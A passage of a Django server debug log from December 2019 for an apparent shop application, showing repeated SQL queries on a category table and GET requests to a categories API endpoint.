ASC; args=(10,) [13/Dec/2019 10:51:02] "GET /api/v1/categories/10 HTTP/1.0" 200 181 DEBUG 2019-12-13 10:51:31,288 utils 11259 139831538779904 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 10:51:31,292 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [13/Dec/2019 10:51:31] "GET /api/v1/categories/10 HTTP/1.0" 200 181 DEBUG 2019-12-13 10:53:02,364 utils 11259 139831538779904 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 10:53:02,369 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [13/Dec/2019 10:53:02] "GET /api/v1/categories/10 HTTP/1.0" 200 181 [13/Dec/2019 10:54:38] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-13 10:56:29,085 utils 11259 139831538779904 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 10:56:29,090 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [13/Dec/2019 10:56:29] "GET /api/v1/categories/10 HTTP/1.0" 200 181 DEBUG 2019-12-13 10:56:34,214 utils 11259 139831538779904 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 10:56:34,219 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [13/Dec/2019 10:56:34] "GET /api/v1/categories/10 HTTP/1.0" 200 181 DEBUG 2019-12-13 10:57:27,418 utils 11259 139831538779904 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 10:57:27,422 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [13/Dec/2019 10:57:27] "GET /api/v1/categories/10 HTTP/1.0" 200 181 DEBUG 2019-12-13 10:58:34,723 utils 11259 139831538779904 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 10:58:34,728 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [13/Dec/2019 10:58:34] "GET /api/v1/categories/10 HTTP/1.0" 200 181 [13/Dec/2019 10:59:41] "GET / HTTP/1.0" 302 0 [13/Dec/2019 11:00:01] "GET /whm-server-status HTTP/1.0" 301 0 DEBUG 2019-12-13 11:00:02,656 utils 11259 139831538779904 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 11:00:02,663 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [13/Dec/2019 11:00:02] "GET /api/v1/categories/10 HTTP/1.0" 200 181 DEBUG 2019-12-13 11:00:24,573 utils 11259 139831538779904 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 11:00:24,579 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [13/Dec/2019 11:00:24] "GET /api/v1/categories/10 HTTP/1.0" 200 181 DEBUG 2019-12-13 11:00:44,400 utils 11259 139831538779904 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 11:00:44,406 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [13/Dec/2019 11:00:44] "GET /api/v1/categories/10 HTTP/1.0" 200 181 DEBUG 2019-12-13 11:00:53,790 utils 11259 139831538779904 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 11:00:53,797 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [13/Dec/2019 11:00:53] "GET /api/v1/categories/10 HTTP/1.0" 200 181 DEBUG 2019-12-13 11:01:20,220 utils 11259 139831538779904 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 11:01:20,224 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [13/Dec/2019 11:01:20] "GET /api/v1/categories/10 HTTP/1.0" 200 181 DEBUG 2019-12-13 11:02:52,665 utils 11259 139831538779904 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 11:02:52,670 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [13/Dec/2019 11:02:52] "GET /api/v1/categories/10 HTTP/1.0" 200 181 DEBUG 2019-12-13 11:03:24,014 utils 11259 139831538779904 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 11:03:24,019 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [13/Dec/2019 11:03:24] "GET /api/v1/categories/10 HTTP/1.0" 200 181 DEBUG 2019-12-13 11:03:49,232 utils 11259 139831538779904 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 11:03:49,237 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [13/Dec/2019 11:03:49] "GET /api/v1/categories/10 HTTP/1.0" 200 181 [13/Dec/2019 11:05:03] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-13 11:07:18,092 utils 11259 139831538779904 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 11:07:18,096 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [13/Dec/2019 11:07:18] "GET /api/v1/categories/10 HTTP/1.0" 200 181 DEBUG 2019-12-13 11:08:22,913 utils 11259 139831538779904 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 11:08:22,917 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [13/Dec/2019 11:08:22] "GET /api/v1/categories/10 HTTP/1.0" 200 181 DEBUG 2019-12-13 11:09:23,814 utils 11259 139831538779904 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 11:09:23,820 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [13/Dec/2019 11:09:23] "GET /api/v1/categories/10 HTTP/1.0" 200 181 [13/Dec/2019 11:10:05] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-13 11:13:30,891 utils 11259 139831538779904 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 11:13:30,895 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [13/Dec/2019 11:13:30] "GET /api/v1/categories/10 HTTP/1.0" 200 181 DEBUG 2019-12-13 11:14:01,989 utils 11259 139831538779904 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 11:14:01,993 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [13/Dec/2019 11:14:01] "GET /api/v1/categories/10 HTTP/1.0" 200 181 DEBUG 2019-12-13 11:14:06,336 utils 11259 139831538779904 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 11:14:06,340 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [13/Dec/2019 11:14:06] "GET /api/v1/categories/10 HTTP/1.0" 200 181 DEBUG 2019-12-13 11:14:34,934 utils 11259 139831538779904 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 11:14:34,939 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [13/Dec/2019 11:14:34] "GET /api/v1/categories/10 HTTP/1.0" 200 181 [13/Dec/2019 11:15:08] "GET / HTTP/1.0" 302 0 [13/Dec/2019 11:18:49] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-13 11:19:39,958 utils 11259 139831538779904 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 11:19:39,964 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [13/Dec/2019 11:19:39] "GET /api/v1/categories/10 HTTP/1.0" 200 181 [13/Dec/2019 11:20:10] "GET / HTTP/1.0" 302 0 [13/Dec/2019 11:20:40] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-13 11:21:49,915 utils 11259 139831538779904 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 11:21:49,920 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [13/Dec/2019 11:21:49] "GET /api/v1/categories/10 HTTP/1.0" 200 181 DEBUG 2019-12-13 11:22:32,725 utils 11259 139831538779904 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 11:22:32,729 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [13/Dec/2019 11:22:32] "GET /api/v1/categories/10 HTTP/1.0" 200 181 DEBUG 2019-12-13 11:24:13,101 utils 11259 139831538779904 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 11:24:13,106 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [13/Dec/2019 11:24:13] "GET /api/v1/categories/10 HTTP/1.0" 200 181 [13/Dec/2019 11:25:13] "GET / HTTP/1.0" 302 0 [13/Dec/2019 11:30:16] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-13 11:32:16,765 utils 11259 139831538779904 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 11:32:16,772 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [13/Dec/2019 11:32:16] "GET /api/v1/categories/10 HTTP/1.0" 200 181 [13/Dec/2019 11:35:42] "GET / HTTP/1.0" 302 0 [13/Dec/2019 11:39:38] "GET / HTTP/1.0" 302 0 [13/Dec/2019 11:40:45] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-13 11:41:38,570 utils 11259 139831538779904 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 11:41:38,575 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 11:41:38,578 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 11:41:38,580 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 11:41:38,583 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 11:41:38,586 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 11:41:38,588 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 11:41:38,590 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 11:41:38,593 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 11:41:38,595 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 11:41:38,597 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 11:41:38] "GET /api/v1/categories/ HTTP/1.0" 200 1769 DEBUG 2019-12-13 11:41:38,633 utils 11259 139831538779904 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 11:41:38,639 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", 